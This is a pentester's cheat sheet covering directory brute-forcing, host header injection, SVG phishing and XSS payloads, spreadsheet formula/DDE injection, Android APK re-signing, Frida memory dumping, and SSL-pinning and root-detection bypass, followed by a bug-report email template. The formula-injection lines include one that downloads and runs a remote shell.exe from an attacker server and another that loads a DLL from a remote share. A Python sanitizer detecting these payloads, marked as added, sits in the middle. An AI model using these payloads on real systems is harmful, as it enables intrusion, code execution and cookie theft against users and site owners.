Integrity: data is changed only by authorised parties.
Availability: data is available when the user needs it.
Confidentiality: data is accessed only by authorised parties.
dirb https://domain.com/ /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://fakebank.com -w wordlist.txt
dirb https://domain.com/ /usr/share/wordlists/wfuzz/vulns/dirTraversal-nix.txt
https://penetesterhelper.github.io/clickjacking.html?url=https://penetesterhelper.github.io
TLS 1.0 and TLS 1.1 are vulnerable (deprecated protocol versions)
nmap -Pn --script ssl-enum-ciphers {domain} -p {port}
1. Basic
Change the "Host" header and check whether the response is 200 OK or not; if it is 200 OK, then look for a 302 response.
2. Via middleware (for password resetting)
Add X-Forwarded-Host: domain.com
3. Via dangling markup
Change "Host: domain.com" to "Host: domain.com:attacker.com"
1. Phishing Attack
<svg width="1500" height="1500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<foreignObject width="1500px" height="1500px">
<iframe xmlns="http://www.w3.org/1999/xhtml" style="width: 1500px; height: 1500px;" src="https://numberless-holddown.000webhostapp.com/"/>
</foreignObject>
</svg>
2. XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
=@MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!_xlbgnm.A1
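A defender-side check for the formula-injection payloads listed above, added here as an example and not taken from the original notes. The leading-character trigger set and the DDE regex are assumptions (commonly cited heuristics, not an exhaustive list); the sample rows are constructed.

```python
import csv
import io
import re

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula (assumption: the commonly cited set, not exhaustive). Tab and
# carriage return are included because some importers let them split a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# DDE pipe syntax such as cmd|' /C calc'!A0, and the DDE(...) function itself,
# so a payload is still caught when no trigger character sits at the front.
DDE_PATTERN = re.compile(r"\w+\|'[^']*'!|\bDDE\s*\(", re.IGNORECASE)


def is_formula_injection(value) -> bool:
    """True when a cell would be evaluated by a spreadsheet rather than shown as text."""
    if not isinstance(value, str) or not value:
        return False
    return value.startswith(FORMULA_TRIGGERS) or bool(DDE_PATTERN.search(value))


def neutralize(value):
    """Prefix suspicious cells with a single quote so spreadsheets render them as text."""
    if is_formula_injection(value):
        return "'" + value
    return value


def export_csv(rows) -> str:
    """Serialise rows (lists of cells) to CSV with every dangerous cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(cell) for cell in row])
    return buf.getvalue()


# Constructed sample export: harmless names beside user-supplied cells that reuse
# the payload shapes listed above. Note that "-5 degrees" is also flagged: the
# prefix rule is deliberately conservative and will quote negative numbers too.
SAMPLE_ROWS = [
    ["name", "comment"],
    ["Alice", "=cmd|' /C calc'!A0"],
    ["Bob", "@SUM(1+9)*cmd|' /C calc'!A0"],
    ["Carol", 'DDE ("cmd";"/C calc";"!A0")A0'],
    ["Dave", "-5 degrees"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```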
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CORS%20Misconfiguration/README.md
1. Decompiling an APK
apktool d apk_name
2. Rebuilding the APK
apktool b apk_name
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
java -jar .\apksigner.jar sign --ks my-release-key.keystore app-debug.apk
frida-ps -U
python3 fridump.py -U -s "UPCL Smart Billing"
Reference: http://pentestcorner.com/fridump-android-examples/
1. Tools
1) Android Emulator API 32
2) Burp Suite
2. Install the Frida server on the Android emulator
adb push frida_server /data/local/tmp
adb push ca_cert /data/local/tmp
3. Install Frida on Windows or Linux
pip3 install frida-tools
pip3 install objection frida-tools
4. Find the package name
frida-ps -Ua
SSL pinning bypass
objection -g package_name explore
android sslpinning disable
Root detection bypass
frida -U --codeshare dzonerzy/fridantiroot -f YOUR_BINARY
adb root
adb pull /data/app/{package-name} /{location}
adb push {file.path} {location}
adb shell am start -n {package_name}/.{activity_name}
Subject: Security Vulnerabilities Found on Website
Dear [name],
I recently visited your website and noticed a bug while navigating through the pages. I am writing to notify you that I have identified several security vulnerabilities on your website. Specifically, I discovered a [Vulnerability_Name]. These are serious issues which could potentially lead to a data breach or other malicious activity if left unaddressed. As such, it is important that these issues be addressed as soon as possible in order to protect your website from potential threats. Please let me know how you would like me to proceed with providing additional information about these findings, so we can work together towards resolving them quickly and efficiently for the safety of your customers' data and other sensitive information stored within the system.
POC: [POC]
Sincerely,
[Your Name]